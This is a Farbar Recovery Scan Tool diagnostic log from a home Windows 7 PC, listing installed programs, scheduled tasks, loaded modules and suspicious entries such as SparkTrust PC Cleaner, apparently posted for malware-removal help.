2016-05-02 18:33 - 2009-07-13 23:45 - 00028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-05-02 18:33 - 2009-07-13 23:45 - 00028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-05-02 18:24 - 2014-11-15 06:50 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-05-02 00:59 - 2013-02-24 07:52 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-05-01 20:48 - 2014-03-16 12:02 - 00000000 ____D C:\Users\kathy\AppData\Local\Battle.net
2016-05-01 06:39 - 2014-03-16 12:01 - 00000000 ____D C:\Program Files (x86)\Battle.net
2016-05-01 01:00 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-04-30 16:13 - 2009-07-14 00:13 - 00795858 _____ C:\Windows\system32\PerfStringBackup.INI
2016-04-30 16:07 - 2013-05-04 20:55 - 00004182 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-04-30 16:06 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-04-29 14:34 - 2012-09-16 09:22 - 00000000 ____D C:\Program Files (x86)\World of Warcraft
2016-04-28 15:00 - 2016-03-11 13:13 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-04-28 15:00 - 2016-03-11 13:13 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-04-27 23:59 - 2013-05-04 20:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2016-04-26 13:29 - 2012-05-16 08:07 - 00000000 ____D C:\Program Files (x86)\Diablo III
2016-04-23 12:41 - 2014-03-18 19:33 - 00003206 _____ C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-3123285271-2719112281-3259339859-1000
2016-04-23 12:41 - 2013-06-21 09:13 - 00003340 _____ C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-3123285271-2719112281-3259339859-1000
2016-04-23 10:56 - 2015-07-11 06:42 - 00000000 ____D C:\Program Files (x86)\Diablo III Public Test
2016-04-19 06:02 - 2014-02-16 21:08 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-04-19 06:01 - 2014-02-16 21:07 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-04-17 06:18 - 2011-12-30 14:54 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-04-17 06:16 - 2011-12-30 14:55 - 00002519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-04-16 12:39 - 2016-02-14 09:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-04-12 06:14 - 2012-08-07 17:24 - 00000000 ____D C:\Users\kathy\Desktop\just stuff to keep
2016-04-09 06:42 - 2014-03-16 12:14 - 00000000 ____D C:\Windows\Minidump
2016-04-07 13:44 - 2013-05-04 19:19 - 00797376 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-04-07 13:44 - 2013-05-04 19:19 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-07 13:44 - 2013-05-04 19:19 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater

==================== Files in the root of some directories =======

2016-05-02 19:16 - 2016-05-02 19:26 - 0000115 _____ () C:\Users\kathy\AppData\Roaming\LogFile.txt
2014-05-24 06:34 - 2014-05-24 06:34 - 0000042 _____ () C:\Users\kathy\AppData\Roaming\mbam.context.scan
2013-12-22 18:23 - 2014-01-16 01:24 - 0000056 _____ () C:\Users\kathy\AppData\Roaming\WB.CFG
2013-08-20 19:55 - 2013-08-20 19:55 - 0003584 _____ () C:\Users\kathy\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-15 17:18 - 2011-09-15 17:18 - 0000093 _____ () C:\Users\kathy\AppData\Local\fusioncache.dat
2011-04-28 21:57 - 2016-02-14 08:06 - 0007609 _____ () C:\Users\kathy\AppData\Local\resmon.resmoncfg

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:03-05-2016
Ran by [removed] (2016-05-02 19:32:33)
Running from C:\Users\[removed]\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2011-04-29 00:50:16)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3123285271-2719112281-3259339859-500 - Administrator - Disabled)
ASPNET (S-1-5-21-3123285271-2719112281-3259339859-1004 - Limited - Enabled)
Guest (S-1-5-21-3123285271-2719112281-3259339859-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3123285271-2719112281-3259339859-1002 - Limited - Enabled)
kathy (S-1-5-21-3123285271-2719112281-3259339859-1000 - Administrator - Enabled) => C:\Users\kathy

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\…\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\…\Adobe AIR) (Version: 21.0.0.198 - Adobe Systems Incorporated)
Adobe Flash Player 21 ActiveX (HKLM-x32\…\Adobe Flash Player ActiveX) (Version: 21.0.0.213 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32\…\Adobe Flash Player NPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\…\{9AB0D5B6-4779-8C4F-CA91-A1FEDB56D7EC}) (Version: 8.0.911.0 - Advanced Micro Devices, Inc.)
Apple Application Support (32-bit) (HKLM-x32\…\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\…\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\…\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\…\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\…\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.4.5.0 - Asmedia Technology)
Auslogics DiskDefrag (HKLM-x32\…\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.5.5.0 - Auslogics Labs Pty Ltd)
Avast Free Antivirus (HKLM-x32\…\avast) (Version: 11.1.2245 - AVAST Software)
Battle.net (HKLM-x32\…\Battle.net) (Version:  - Blizzard Entertainment)
Bonjour (HKLM\…\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\…\CCleaner) (Version: 4.17 - Piriform)
Diablo III (HKLM-x32\…\Diablo III) (Version:  - Blizzard Entertainment)
Futuremark SystemInfo (HKLM-x32\…\{BEE64C14-BEF1-4610-8A68-A16EAA47B882}) (Version: 4.0.0.0 - Futuremark Corporation)
Google Chrome (HKLM-x32\…\Google Chrome) (Version: 50.0.2661.94 - Google Inc.)
Google Drive (HKLM-x32\…\{D7269C20-B3CE-4CD0-8E88-3D307D3BD41A}) (Version: 1.29.2074.1528 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP Deskjet 1050 J410 series Basic Device Software (HKLM\…\{4268BF51-DFDF-4178-8B8D-5D5752FCAA58}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 1050 J410 series Help (HKLM-x32\…\{5C90D8CF-F12A-41C6-9007-3B651A1F0D78}) (Version: 140.0.66.66 - Hewlett Packard)
HP Photo Creations (HKLM-x32\…\HP Photo Creations) (Version: 1.0.0.12262 - HP Photo Creations Powered by RocketLife)
HP Update (HKLM-x32\…\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
iCloud (HKLM\…\{4B48E22A-2FB0-4EFA-B99E-954B1E50CD69}) (Version: 5.1.0.34 - Apple Inc.)
Intel(R) Management Engine Components (HKLM-x32\…\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
iTunes (HKLM\…\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
JMicron JMB36X Driver (HKLM-x32\…\{3A1B5D40-41E9-43FA-8C7B-A8667F5586EF}) (Version: 1.00.0000 - JMICRON Technology Corp.)
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Logitech GamePanel Software 3.03.133 (HKLM\…\{6CC95B76-D380-46B2-9022-9353938E48BA}) (Version: 3.03.133 - Logitech Inc.)
Logitech SetPoint 6.65 (HKLM\…\sp6) (Version: 6.65.62 - Logitech)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\…\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\…\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 4.5.2 (HKLM\…\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft IntelliPoint 7.1 (HKLM\…\{5EBE0F1F-45DF-4298-AC6B-E8E54EAEC834}) (Version: 7.10.344.0 - Microsoft)
Microsoft IntelliType Pro 8.1 (HKLM\…\Microsoft IntelliType Pro 8.1) (Version: 8.15.406.0 - Microsoft)
Microsoft Office Professional Plus 2013 - en-us (HKLM\…\ProPlusRetail - en-us) (Version: 15.0.4815.1001 - Microsoft Corporation)
Microsoft Silverlight (HKLM\…\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\…\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\…\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\…\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\…\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\…\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\…\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\…\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\…\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\…\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\…\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\…\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\…\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 46.0 (x86 en-US) (HKLM-x32\…\Mozilla Firefox 46.0 (x86 en-US)) (Version: 46.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\…\MozillaMaintenanceService) (Version: 45.0.2.5941 - Mozilla)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
RealDownloader (x32 Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\…\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\…\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.37.1229.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\…\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6251 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Secunia PSI (2.0.0.4003) (HKLM-x32\…\Secunia PSI) (Version: 2.0.0.4003 - Secunia)
SparkTrust PC Cleaner Plus (HKLM-x32\…\{35827710-D042-428B-A1E5-E20E12D2FEB9}) (Version: 3.2.20.0 - SparkTrust) <==== ATTENTION
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Ventrilo Client (HKLM-x32\…\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.8 - Flagship Industries, Inc.)
Ventrilo Server (HKLM-x32\…\{1D46A3A0-B37D-423A-91C2-101A49E2FF80}) (Version: 3.0.3 - Flagship Industries, Inc.)
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
Windows Live Essentials (HKLM-x32\…\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Sign-in Assistant (HKLM-x32\…\{45338B07-A236-4270-9A77-EBB4115517B5}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\…\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\…\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
World of Warcraft (HKLM-x32\…\World of Warcraft) (Version:  - Blizzard Entertainment)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {074EC646-EFF5-4CA5-A892-6C066DC5CE87} - System32\Tasks\{B937D728-AB5C-4F88-8D65-C3ADBD29CE50} => pcalua.exe -a D:\SETUP.EXE -d D:\
Task: {19B7D6A0-1808-4FD1-BD19-935DAD1FA2A4} - System32\Tasks\{FC628A37-3763-4AC5-B27E-973517F50165} => C:\Users\kathy\Desktop\Diablo-III-8370-enUS-Installer-downloader.exe
Task: {26563BA1-3BD0-441E-8C85-D44EFEB87A00} - System32\Tasks\{80A88456-7E5F-45D3-9003-B567194B373F} => Firefox.exe
Task: {375D7310-C802-4889-9808-CBEBB3DFA519} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-27] (Microsoft Corporation)
Task: {3D49DEAE-65F0-42BA-B0F6-980FAFAD575A} - System32\Tasks\HP Photo Creations Communicator => C:\ProgramData\HP Photo Creations\Communicator.exe [2013-09-22] ()
Task: {3F180597-B0E1-4B7F-A766-ECE646A1DA86} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-27] (Microsoft Corporation)
Task: {3F1AA883-2D57-4DCA-8705-C253A9C6ED2A} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {4CA61C7B-185B-43D7-A1B9-F710F69AA15D} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {54483BD9-4311-4CC4-9961-6DD0E5C74162} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {5AA811E4-98D0-4C9F-87D0-F0ADED37088B} - System32\Tasks\SparkTrust Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll" RunUns <==== ATTENTION
Task: {5D874E5D-2530-4DCB-9B0E-B1F439BB8F53} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {5D9ADB66-F56E-4896-87B0-D5E59E13B2DB} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-08-21] (Piriform Ltd)
Task: {6EB435D2-BA79-44AE-B40D-A5E4C18440CE} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2014-10-29] ()
Task: {7082B9F6-7D22-46E9-9E44-D38D3F334491} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {729C2EA9-0D4D-4616-AAC2-0744E1C96EAE} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2014-10-27] (RealNetworks, Inc.)
Task: {8C0A9A69-B02A-4A69-AB1D-AE566E0044E7} - System32\Tasks\{F1349365-EEF0-4FFD-83DC-DD80BFB66B89} => pcalua.exe -a C:\Users\kathy\Desktop\Install_LiveX.exe -d C:\Users\kathy\Desktop
Task: {8C3F1A35-D8C6-4C2E-AB0A-CE9CA221ADCE} - System32\Tasks\{509E5DCA-AED4-4CEE-B17E-F6DB33AADABF} => D:\SETUP.EXE
Task: {8C6895D3-0BF3-4933-847A-5DA5C3B42109} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-04-07] (Adobe Systems Incorporated)
Task: {90D24CA1-50FD-46D8-8092-0F0F32B01C50} - System32\Tasks\{D85C3585-91EC-4139-B53D-C93D0010DB51} => C:\Users\kathy\Desktop\Diablo-III-8370-enUS-Installer-downloader.exe
Task: {AC92EB93-1188-4506-B4D0-FF3E85A808A3} - System32\Tasks\{82BB1A52-8E3C-4D41-8631-85D01ADC3B3E} => Firefox.exe
Task: {AEECD1B0-A900-4D42-95E5-F48AA4734BEF} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {B7682C1C-A844-4187-9B5E-B73C8D50A2E9} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-01-07] (AVAST Software)
Task: {BAF9CB05-05CF-4AC2-B209-35D80AC576B3} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => C:\Program Files\Microsoft IntelliPoint\IPoint.exe [2009-11-05] (Microsoft Corporation)
Task: {BB60938F-830C-4FDF-847F-F64888B3739B} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2014-10-27] (RealNetworks, Inc.)
Task: {BDA7DC91-A88B-4DBA-8865-D59E05C4219E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {C7209D06-51D5-4119-9F5C-9816E557649E} - System32\Tasks\Microsoft_Hardware_Launch_IType_exe => c:\Program Files\Microsoft IntelliType Pro\IType.exe [2011-04-13] (Microsoft Corporation)
Task: {C7A0D40B-9969-4E55-A0A3-A2B2CF7334D0} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-03-04] (AVAST Software)
Task: {D205FCEE-A6B4-4A6A-B7D3-78B76CA711E9} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {DBAE8D00-D6B8-4ACE-8E93-514AC8319D74} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {F3567804-1232-4C68-83E3-711163422A7B} - System32\Tasks\{D4F55AB1-8DE8-477A-87D1-311CF50DD790} => \KATHY-PC\Users\kathy\Diablo-III-8370-enUS-Installer\Diablo III Setup.exe
Task: {F49367A9-DFA5-4AF1-897D-8B4052C24854} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HP Photo Creations Communicator.job => C:\ProgramData\HP Photo Creations\Communicator.exe
Task: C:\Windows\Tasks\SparkTrust Registration3.job => C:\Windows\system32\rundll32.exeFC:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll <==== ATTENTION

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\kathy\AppData\Local\fb05b4\0b8081.lnk -> C:\Users\kathy\AppData\Local\fb05b4\fe8e31.bat ()

==================== Loaded Modules (Whitelisted) ==============

2015-10-27 06:26 - 2015-09-01 11:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-10-29 20:06 - 2014-10-29 20:06 - 00560192 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
2014-03-18 19:47 - 2015-10-13 05:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2014-10-26 23:59 - 2014-10-26 23:59 - 00039568 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
2014-10-30 06:41 - 2014-10-30 06:41 - 00031856 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
2016-01-07 19:25 - 2016-01-07 19:25 - 00103888 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-01-07 19:25 - 2016-01-07 19:25 - 00125512 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-04-30 03:51 - 2016-04-30 03:51 - 02892288 _____ () C:\Program Files\AVAST Software\Avast\defs\16043000\algo.dll
2016-04-14 07:25 - 2016-04-14 07:25 - 00510368 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-05-02 08:49 - 2016-05-02 08:49 - 02892288 _____ () C:\Program Files\AVAST Software\Avast\defs\16050200\algo.dll
2016-01-07 19:25 - 2016-01-07 19:25 - 00241896 _____ () C:\Program Files\AVAST Software\Avast\browser_pass.dll
2016-05-02 19:18 - 2016-05-02 19:18 - 02892288 _____ () C:\Program Files\AVAST Software\Avast\defs\16050203\algo.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01040656 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00237328 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2015-10-27 06:26 - 2015-09-01 07:25 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll
2014-10-29 20:01 - 2014-10-29 20:01 - 01382048 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\cpprest100_1_2.dll
2014-10-29 20:07 - 2014-10-29 20:07 - 00065600 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\dtvhooks.dll
2014-05-11 06:54 - 2015-02-18 22:05 - 00865880 _____ () c:\program files (x86)\real\realplayer\RPDS\Plugins\cldplin.dll
2014-10-30 06:41 - 2014-10-30 06:41 - 00035976 _____ () C:\Program Files (x86)\Real\UpdateService\DL2UpdatePlugin.dll
2014-10-30 06:41 - 2014-10-30 06:41 - 00039560 _____ () C:\Program Files (x86)\Real\UpdateService\RealDownloaderUpdatePlugin.dll
2014-10-30 06:41 - 2014-10-30 06:41 - 00032888 _____ () C:\Program Files (x86)\Real\UpdateService\RPDSUpdatePlugin.dll
2016-01-07 19:25 - 2016-01-07 19:25 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-04-07 13:44 - 2016-04-07 13:44 - 19403968 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_213.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:430C6D84 [127]
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 [284]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\plsapp => ""="service"

==================== EXE Association (Whitelisted) ===============

